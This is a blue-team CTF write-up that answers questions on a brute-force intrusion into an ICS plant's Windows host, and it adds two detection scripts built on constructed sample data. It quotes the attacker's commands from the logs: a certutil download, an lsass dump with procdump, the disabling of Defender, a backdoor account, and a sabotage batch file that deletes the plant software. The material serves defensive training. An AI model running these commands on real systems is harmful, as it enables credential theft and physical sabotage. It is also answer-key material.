# [Threat Hunting] Hafinum-APT blue team ctf
:::info
:bulb: Files provided:
- winevt.zip: Windows event logs
- c83-HAFINUM.ova: VM image to import for the ELK SIEM environment (http://127.0.0.1:5601 - no login required)
- Tools used:
(+) Hayabusa: https://github.com/Yamato-Security/hayabusa
- Difficulty: Medium
- Link: https://cyberdefenders.org/blueteam-ctf-challenges/103#nav-questions
- Investigating through the raw Windows Event Logs or through the SIEM gives the same results
:::
### :small_blue_diamond: **Date: 12/06/2023**
## :dart: Scenario
:::success
Specialists at an electronic component manufacturing plant noticed abnormal activity originating from a public IP address and suspect that the plant's IT systems have been compromised. Acting as the incident responder, investigate the traces and determine the root cause of the incident.
:::
## :heavy_check_mark: Questions
### 1. What is the name of the threat detected by Windows Defender?
#### Answer: Trojan:Win32/Ceprolad.A
Check the Windows Defender log (Microsoft-Windows-Windows Defender/Operational), Event ID 1116:
```
3/12/2021 3:17:55 PM
Name: Trojan:Win32/Ceprolad.A
C:\Windows\System32\certutil.exe -urlcache -split -f https://download.sysinternals.com/files/Procdump.zip procdump.zip
User: NT AUTHORITY\SYSTEM
Computer: PoopController
```
> KQL: event.code:1116 AND winlog.event_data.FWLink:*
The attacker used the Windows built-in certutil to download [Procdump](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump) (a tool from the Sysinternals suite developed by Microsoft, commonly abused to [dump the lsass.exe process](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz) during an attack in order to extract authentication credentials from the compromised server/workstation).
### 2. What was the full URL that Windows Defender blocked an archive from being downloaded?
#### Answer: https://download.sysinternals.com/files/Procdump.zip
Besides the Windows Defender logs, Sysmon Event ID 1 (Microsoft-Windows-Sysmon/Operational) and Security Event ID 4688 (when the audit policy is fully configured) also record the command line the attacker executed.
### 3. What was the full command used by the attacker to successfully download the archive?
#### Answer: certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/Procdump.zip" procdump.zip
```
Process Create:
Event ID: 1
UtcTime: 2021-03-12 08:23:47.391
ProcessId: 8884
Image: C:\Windows\System32\certutil.exe
OriginalFileName: CertUtil.exe
CommandLine: certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/Procdump.zip" procdump.zip
CurrentDirectory: C:\windows\system32\
User: POOPCONTROLLER\Administrator
LogonGuid: {93524514-2033-604b-5a53-cc0000000000}
LogonId: 0xCC535A
TerminalSessionId: 3
IntegrityLevel: High
Hashes: MD5=E376B07AA887A6085CEAE9BE62AC9C37,SHA256=48922BB6498C432DD248CD337F4DCEE0BFE77EE3ECBB1F8020D6DB1F135E8E00,IMPHASH=683B8A445B00A271FC57848D893BD6C4
ParentProcessGuid: {93524514-2453-604b-cd04-000000000900}
ParentProcessId: 4648
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe"
```
### 4. Which user account was the attacker using when the archive was successfully downloaded to the host?
#### Answer: Administrator
### 5. What command was used by the attacker on the host to try and disable Windows Defender via the command line?
#### Answer: sc stop WinDefend
```
Process Create:
Event ID: 1
UtcTime: 2021-03-12 08:20:49.500
ProcessId: 5900
Image: C:\Windows\System32\sc.exe
OriginalFileName: sc.exe
CommandLine: sc stop WinDefend
CurrentDirectory: C:\windows\system32\
User: POOPCONTROLLER\Administrator
IntegrityLevel: High
Hashes: MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF
ParentProcessId: 4648
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\windows\system32\cmd.exe"
```
### 6. Provide the date and time when Windows Defender's real-time protection was disabled. (24H-UTC)
#### Answer: 2021-03-12 08:21:35 UTC
Check event ID `5001 - Windows Defender Antivirus Real-time Protection scanning for malware and other potentially unwanted software was disabled` in the Microsoft-Windows-Windows Defender/Operational log.
### 7. Which version of ProcDump did the attacker run on the host?
#### Answer: 10.0
Sysmon gives us the details of the procdump executable:
```
"CommandLine": "procdump -ma lsass.exe lsass.dmp",
"ParentCommandLine": "\"C:\\windows\\system32\\cmd.exe\" ",
"Image": "C:\\tmp\\procdump.exe",
"Product": "ProcDump",
"User": "POOPCONTROLLER\\Administrator",
"RuleName": "-",
"FileVersion": "10.0",
"CurrentDirectory": "c:\\tmp\\",
"Hashes": "MD5=D3763FFBFAF30BCFD866B8ED0324E7A3,SHA256=916CC8D6BF2282AE0D2DB587F4F96780AF59E685A1F1A511E0B2B276669DC802,IMPHASH=83B075100F8ECC5BF8446EDDD8E9CD6E",
"UtcTime": "2021-03-12 08:29:25.729",
"ParentProcessId": "4648",
```
> KQL: event.code:1 AND winlog.event_data.Image : *procdump*
### 8. Where is the executable located on the disk that was targeted by Procdump to dump its process memory?
#### Answer: C:\windows\system32\lsass.exe
### 9. What was the location of the dump file created from the process dumped with Procdump?
#### Answer: C:\tmp\lsass.dmp
Check Sysmon Event ID 11 (File Created).

### 10. Provide the SHA256 hash value of the Teamviewer installation to check if the legitimate version was installed.
#### Answer: D256F177A3DD8E7346B3FA9D32C4690B611F104E7CE175E99C5757BE6EEF229B
```
Process Create:
RuleName: -
UtcTime: 2021-03-12 13:01:06.790
ProcessId: 3180
Image: C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FileVersion: 15.15.5.0
Description: TeamViewer
Product: TeamViewer
Company: TeamViewer Germany GmbH
OriginalFileName: TeamViewer_Service.exe
CommandLine: "C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe"
CurrentDirectory: C:\windows\system32\
User: NT AUTHORITY\SYSTEM
LogonGuid: {93524514-660a-604b-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: MD5=7B1B9039FED3AB2B6FD24E6F046D0E52,SHA256=D256F177A3DD8E7346B3FA9D32C4690B611F104E7CE175E99C5757BE6EEF229B,IMPHASH=E48F1FCD9590178AE7A76FB41C5B36D0
ParentProcessGuid: {93524514-660a-604b-0b00-000000000a00}
ParentProcessId: 696
ParentImage: C:\Windows\System32\services.exe
ParentCommandLine: C:\windows\system32\services.exe
```
### 11. What was the domain looked up in the first DNS query done by the TeamViewer application after it was installed?
#### Answer: router7.teamviewer.com
```
Dns query:
RuleName: -
UtcTime: 2021-03-10 04:40:51.316
ProcessGuid: {93524514-4dcc-6048-f100-000000000500}
ProcessId: 3232
QueryName: router7.teamviewer.com
QueryStatus: 0
QueryResults: type: 5 routerpool7.rlb.teamviewer.com;::ffff:37.252.253.104;::ffff:188.172.198.137;::ffff:178.255.155.179;::ffff:213.227.168.147;::ffff:217.146.13.133;
Image: C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
```
### 12. Determine how the attacker gained access to the Administrator account.
#### Answer: brute-force attack
From the logon-related events (4624, 4625) we detect a brute-force attack against the Administrator account from a single public IP address, 8.36.216.58.
### 13. What IP address can we send to the Firewall team for blocking?
#### Answer: 8.36.216.58
Check Event IDs 4624 and 4625 (Logon success / Logon failure) in the Security log.
Check Event ID 3 (Network Connection) in the Sysmon log.

### 14. What was the hostname from where the attacker launched their attack?
#### Answer: FancyPoodle
### 15. Provide the first timestamp from the logs where you can see the attacker's login was successful. (24H-UTC)
#### Answer: 2021-03-11 20:26:52 UTC

### 16. Provide the date in UTC time of when the attacker successfully logged into the host using RDP for the first time. (24H-UTC)
#### Answer: 2021-03-12 08:03:00

> KQL: event.code : "4624" and winlog.event_data.LogonType :10 AND winlog.event_data.IpAddress: 8.36.216.45
Logon Type 10 = RemoteInteractive (RDP)
Event ID 21 - Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
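Questions 12 to 16 are answered by correlating Security-log 4625 failures with the 4624 successes that follow them from the same source, then filtering the successes on LogonType 10 for the first RDP session. The script below is an added example and not part of the writeup; its records are constructed in the shape of the fields used above (time, EventID, LogonType, IpAddress, WorkstationName, TargetUserName), with the attacker's IP and hostname taken from the answers, and the second remote host, its user and the exact logon types of the attacker's first success made up for illustration.

```python
"""Brute-force detection over Security-log 4624/4625 records, plus first success and
first RDP success per source IP.  Added example; the records are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample: a burst of 4625 failures from one public IP followed by a 4624
# success, a later 4624 with LogonType 10 (RDP) from the same IP, a legitimate remote
# logon from another host, and a console logon that carries no source address.
SAMPLE_LOGONS: List[Tuple[str, int, int, str, str, str]] = [
    ("2021-03-11 20:26:40", 4625, 3, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-11 20:26:42", 4625, 3, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-11 20:26:44", 4625, 3, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-11 20:26:46", 4625, 3, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-11 20:26:48", 4625, 3, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-11 20:26:50", 4625, 3, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-11 20:26:52", 4624, 3, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-12 08:03:00", 4624, 10, "8.36.216.58", "FancyPoodle", "Administrator"),
    ("2021-03-12 07:30:00", 4625, 10, "10.10.5.7", "OPS-LAPTOP", "jdoe"),
    ("2021-03-12 07:30:20", 4624, 10, "10.10.5.7", "OPS-LAPTOP", "jdoe"),
    ("2021-03-12 07:55:00", 4624, 2, "-", "POOPCONTROLLER", "Administrator"),
]


def detect_bruteforce(records, threshold: int = 5, window: timedelta = timedelta(minutes=10)) -> Dict[str, dict]:
    """Per source IP: count 4625 failures, flag a 4624 preceded by >= threshold failures
    inside `window`, and record the first success and the first LogonType-10 success."""
    rows = sorted((datetime.strptime(t, FMT), eid, lt, ip, ws, user)
                  for t, eid, lt, ip, ws, user in records)
    failures = defaultdict(list)          # ip -> timestamps of 4625 events
    report: Dict[str, dict] = {}
    for ts, eid, lt, ip, ws, user in rows:
        if ip in ("-", ""):
            continue                      # console/local logons have no source address
        entry = report.setdefault(ip, {"workstation": ws, "users": set(), "failures": 0,
                                       "brute_forced": False, "first_success": None, "first_rdp": None})
        entry["users"].add(user)
        if eid == 4625:
            failures[ip].append(ts)
            entry["failures"] += 1
        elif eid == 4624:
            recent = [f for f in failures[ip] if ts - f <= window]
            if len(recent) >= threshold:  # success right after a burst of failures
                entry["brute_forced"] = True
            if entry["first_success"] is None:
                entry["first_success"] = ts.strftime(FMT)
            if lt == 10 and entry["first_rdp"] is None:
                entry["first_rdp"] = ts.strftime(FMT)
    return report


def block_list(report: Dict[str, dict]) -> List[str]:
    """Source IPs that obtained a logon through brute force; hand these to the firewall team."""
    return sorted(ip for ip, e in report.items() if e["brute_forced"])


if __name__ == "__main__":
    rep = detect_bruteforce(SAMPLE_LOGONS)
    for ip, e in rep.items():
        print(ip, e["workstation"], "failures=%d" % e["failures"],
              "brute_forced=%s" % e["brute_forced"], e["first_success"], e["first_rdp"])
    print("block:", block_list(rep))
```

The threshold and window are deliberately parameters: on a busy domain controller a handful of failures per ten minutes is normal, and the signal worth escalating is the success that lands immediately after the burst.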
### 17. When did the attacker log off from the first RDP session? (24H-UTC)
#### Answer: 2021-03-12 08:45:02
Event ID 23 - Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
### 18. What command did the attacker run on the host which would've helped him understand what Antivirus software was running on the system?
#### Answer: tasklist

### 19. Which command did the attacker run on the host that would have helped him understand the network interface configuration of the host?
#### Answer: ipconfig /all
### 20. What was the name of the user account added by the attacker?
#### Answer: Administrator1
`net user /add Administrator1 password!@#!@#`
### 21. Based on information from the public, the first visual signs of raw sewage spilling into the river from the plant were around 14:00 local time on March 12th, 2021. According to the plant technicians, it would take at least 45 minutes for the plant to excrete sewage into the river once the backwash mode was activated. A file was created on the system that matches the above timelines and, based on its content, could likely have been used by the attackers to initiate the plant backwash. What was the name of this file?
#### Answer: backwash.bat
Sysmon Event ID 15 records the .bat file, which was downloaded through Chrome, together with the contents of the .bat file.

### 22. Which application was responsible for downloading the malicious file to the host?
#### Answer: Chrome.exe
### 23. From which website was this malicious file downloaded?
#### Answer: wetransfer.com
```
File stream created:
RuleName: -
UtcTime: 2021-03-12 11:09:03.439
ProcessGuid: {93524514-4bce-604b-fa05-000000000900}
ProcessId: 7048
Image: C:\Program Files\Google\Chrome\Application\chrome.exe
TargetFilename: C:\Users\Administrator\Downloads\backwash.bat:Zone.Identifier
CreationUtcTime: 2021-03-12 11:08:52.011
Hash: MD5=36646BB273E0D8AEB082B302F21CAFE5,SHA256=643FC170C93F6D7D597A383D6FBFCE7E83196DF8AE7822F59FC45F58ECC00D09,IMPHASH=00000000000000000000000000000000
Contents: [ZoneTransfer] ZoneId=3 ReferrerUrl=https://wetransfer.com/
```
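The `Contents` field above is the Zone.Identifier alternate data stream that browsers write next to a downloaded file, and Sysmon Event ID 15 captures it on one line. Decoding it gives the security zone and the site the file came from, which is how questions 21 to 23 are answered. The script below is an added example and not part of the writeup; the first sample event is built from the record above, while the Firefox event, its `example.invalid` URLs and the intranet-zone document are made-up placeholders.

```python
"""Decode Zone.Identifier streams captured by Sysmon Event ID 15 and list files that
arrived from the Internet zone.  Added example; the events are constructed."""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# URL security zones as numbered in the ZoneId field of the stream.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites", 3: "Internet", 4: "RestrictedSites"}

# Constructed samples in the shape of the Event 15 fields shown above.
SAMPLE_STREAM_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": r"C:\Users\Administrator\Downloads\backwash.bat:Zone.Identifier",
     "Contents": "[ZoneTransfer] ZoneId=3 ReferrerUrl=https://wetransfer.com/"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\Administrator\Downloads\tool.zip:Zone.Identifier",
     "Contents": "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://example.invalid/files\r\n"
                 "HostUrl=https://cdn.example.invalid/x/tool.zip"},
    {"Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\Administrator\Documents\report.docx:Zone.Identifier",
     "Contents": "[ZoneTransfer] ZoneId=1 "},
]


def parse_zone_identifier(contents: str) -> dict:
    """Handle both the real INI-style stream (one key per line) and Sysmon's single-line rendering."""
    fields = dict(re.findall(r"(\w+)=(\S+)", contents))
    zone_id: Optional[int] = int(fields["ZoneId"]) if fields.get("ZoneId", "").isdigit() else None
    # HostUrl is the URL the bytes were fetched from; ReferrerUrl is the page that linked to it.
    source = fields.get("HostUrl") or fields.get("ReferrerUrl")
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "Unknown"),
        "referrer": fields.get("ReferrerUrl"),
        "host_url": fields.get("HostUrl"),
        "source_domain": urlparse(source).hostname if source else None,
    }


def internet_downloads(stream_events) -> List[Tuple[str, str, Optional[str]]]:
    """From Event 15 records, return (file, downloading process, source domain) for ZoneId=3 files."""
    hits = []
    for ev in stream_events:
        target = ev["TargetFilename"]
        if not target.lower().endswith(":zone.identifier"):
            continue                              # other streams are not download markers
        info = parse_zone_identifier(ev["Contents"])
        if info["zone_id"] != 3:
            continue
        downloader = ev["Image"].rsplit("\\", 1)[-1].lower()
        hits.append((target[: -len(":Zone.Identifier")], downloader, info["source_domain"]))
    return hits


if __name__ == "__main__":
    for path, proc, domain in internet_downloads(SAMPLE_STREAM_EVENTS):
        print(f"{path} <- {proc} from {domain}")
```

When the stream carries `HostUrl` as well as `ReferrerUrl`, prefer `HostUrl` for attribution: the referrer is only the page the user clicked through, and a file-sharing site can appear there while the payload itself was served from a different host.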
### 24. After this file was downloaded, the attacker appeared to have moved it to another directory on the host. What was the new path of the file?
#### Answer: C:\backwash.bat

```
Image: C:\windows\system32\DllHost.exe
TargetFilename: C:\backwash.bat
```
### 25. Based on the available logs, there are limited indications that the downloaded malicious file was executed on the host. Provide the earliest timestamp which shows proof of the file being executed on the host. (24H-UTC)
#### Answer: 2021-03-12 11:10:03
### 26. What command contained in the malicious file, if successfully run on the host, would you expect to have initiated the plant’s backwash mode
#### Answer: C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no
```
"C:\Program Files\ifak\SIMBA#4.3\Simba.exe --function backwash --interruptable no"
timeout /t 30 /nobreak
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
taskkill /F /IM simba.exe /T
DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3\*"
```
### 27. Prior to switching to a manual override, the technicians attempted to open the modified Simba plant simulation software application in order to stop the backwash sequence. However, they could not get the application to launch. What command from the attacker's script would have rendered the application unusable?
#### Answer: DEL /F /Q "C:\Program Files\ifak\SIMBA#4.3
## :triangular_flag_on_post: Summary
:::success
After successfully brute-forcing the administrator account, the attacker gained access to the system and executed commands to enumerate the system, disable Windows Defender, dump the lsass process, and download additional malicious files.
:::
###### tags: `ThreatHunting` `SIEM-ELK`